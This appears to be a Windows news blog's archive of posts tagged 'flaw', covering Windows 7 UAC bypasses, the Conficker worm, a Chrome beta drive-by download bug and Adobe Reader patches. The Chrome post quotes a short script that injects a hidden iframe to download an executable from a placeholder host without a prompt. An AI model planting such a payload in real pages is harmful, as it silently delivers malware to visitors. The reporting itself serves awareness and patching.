Your best source of information and news about xp, windows vista and drivers on the internet

Vista ARTICLES TOP 50 Spyware Virus Vista SOFT Vista HELP

flaw

You are currently browsing the articles from MS Windows Vista Compatible Software matching the category flaw.

Windows 7 Testers Uncover Another UAC Flaw

Two Windows 7 testers claim they've found a second glitch in the Windows 7 beta's default security configuration that could let malware automatically elevate itself to full administrative privileges without triggering User Account Control prompts or even shutting down UAC at all.

Last week, Microsoft (NSDQ:MSFT) bloggers Long Zheng and Rafael Rivera published simple proof-of-concept code that automatically disables UAC in Windows 7 without any user interaction. On Wednesday, Zheng and Rivera published details on a second UAC flaw in the Windows 7 beta that stems from the OS being set up to automatically elevate Microsoft-signed applications and code in order to minimize UAC alerts.

The problem, according to Zheng, is that some of these trusted, Microsoft-signed applications are designed to execute third-party code for legitimate reasons, which allows attackers to create malware that exploits their trusted status.

"Unfortunately, this flaw is not just a single point of failure. The breadth of Windows executables is just too many and too diverse, and many are exploitable," Zheng wrote.

Microsoft denied that the first UAC flaw was actually a flaw, claiming that the only way UAC could be changed without the user's knowledge was if malicious code was already running on the box.

Microsoft is still investigating the second UAC flaw, said a spokesperson who declined to comment further. However, both Zheng and Rivera reported hearing rumors that the second UAC issue has been fixed in internal Windows 7 builds.

To illustrate the potential impact of the second UAC flaw, Rivera published a proof-of-concept that could let attackers use rundll32.exe -- one of the Microsoft-signed applications -- to execute malicious code on a PC with full administrative privileges.

Zheng recommended that Windows 7 beta users set their UAC settings to 'high' in order to minimize the danger for both flaws. However, that makes UAC in the Windows 7 beta behave in the same overly chatty fashion it did in Vista, which once again highlights the difficulty of balancing security and usability concerns.

While Windows 7 is expected to hew to the same high security standards as Vista, security experts are watching Microsoft's response to the UAC issues closely, and some are beginning to take issue with how the software giant is responding to the UAC reports.

Written by Sekhy! on February 4th, 2009 with no comments.
Read more articles on otherSoftware and windows 7 and flaw and UAC.

Microsofts Warns of Worm Attack

Security researchers at Microsoft last week warned of a significant increase in exploits of the SMB flaw in Windows. The flaw was patched with an emergency fix last month. Microsoft again urged users to install the patch if they have not already done so.

The patch can be found here

Microsoft’s malware protection center said an increase in attacks began last weekend. This is right in line with the rumor I posted a while back that indicated this would happen near the Thanksgiving holiday.

The latest maleware to exploit this flaw is called “Conficker.a” by Microsoft, and “Downloadup” by Symantec. It exploits the flaw in SMB and then installs itself on the target machine. The purpose of the maleware is not clear yet, but it has been studied by security researchers. This is what they have found so far

-It Avoids Ukrainian IP address ranges. This possibly means it was created by someone in this area of the world. It is a common tactic used to reduce the chance of action by local authorities.

-Even more interesting, the worm patches the flaw. This is done so other viruses cannot take the place of it.

-The worm resets the machine’s restore point. Which will make it difficult or impossible to “roll back” windows from a pre-infection state.

It is clear that if you have installed the patch, you are safe. If you have not installed the patch yet I would suggest getting to it as fast as you can. In addition, as a precaution you should always make sure that your SMB services are not available from the public Internet - you never know what other flaws are still hiding in this very old part of Windows.

Written by intelliadmin on December 1st, 2008 with no comments.
Read more articles on otherSoftware and flaw and Windows.

Google Chrome Browser Vulnerable to Security Flaw


A security researcher has published proof-of-concept code showing Google Chrome is vulnerable to an attack targeting an old version of WebKit and a Java bug. News of the flaw came Sept. 2, not long after Google officials announced the launch of the Chrome browser’s beta program. A security researcher has discovered a flaw in the beta version of Google’s Chrome browser that can lead to Windows users downloading malicious Java files.

According to the ZDNET security blog, Israeli security researcher Aviv Raff has released proof-of-concept code that targets a vulnerability in an old version of WebKit being used by the Google browser as well as a Java bug. With a little social engineering, users can be tricked into downloading malware onto Windows desktops.

View: The full story @ eWeek

The following information is from Neowin Forums

Google’s new Web browser (Chrome) allows files (e.g., executables) to be automatically
downloaded to the user’s computer without any user prompt.
Example:
<script>
document.write(’<iframe src=”http://www.example.com/hello.exe” frameborder=”0″ width=”0″ height=”0″>’);
</script>

:arrow: I tested this software on Windows Xp Pro with SP3, seems to be okay. But the compatibility has to be increased to a greater extent in the future

:arrow: Adobe.com was not working to a full extent

:arrow: Does not support Microsoft Silver Light at present

:arrow: Sometimes Gmail does’nt load to full extent

:idea: Incase if you would like to use this software, please configure your Firewall for outbound and inbound permissions for Google Chrome

Written by Maaruthi on September 4th, 2008 with no comments.
Read more articles on Google Chrome Browser Vulnerable to Security Flaw and Chrome Security Flaw and otherSoftware and flaw and Reviews.

Windows Users Not Vulnerable To PDF Flaw

The recently reported flaws discovered in Reader and Acrobat tools urged Adobe, the developer of the vulnerable solutions, to release patches in order to protect the customers of the company. If you haven’t read the advisories, you should know the holes affected Windows XP users with Internet Explorer 7 installed because the attackers tried to exploit them using malicious PDF files. According to Adobe which confirmed the existence of the flaws, the vulnerabilities affect Adobe Reader 8.1 and earlier, Adobe Reader 7.0.9 and earlier, Adobe Acrobat Professional, 3D and Standard 8.1 and earlier versions, Adobe Acrobat Professional, Standard, 3D and Elements 7.0.9 and earlier.

In order to avoid a successful exploitation of the flaw, you have to update your technologies to version 8.1.1 as Adobe implemented the patches in this latest release. (more…)

, , , , , , , , , , , , , , , , , ,

Written by Jason on October 24th, 2007 with no comments.
Read more articles on exploit and email spamming and email attachments and flaw and instant messengers and professional 3d and pdf files and pdf and attackers and adobe reader 8 and internet explorer 7 and Windows and Security and reader and Mail and adobe reader 7 and adobe acrobat professional and Adobe and software.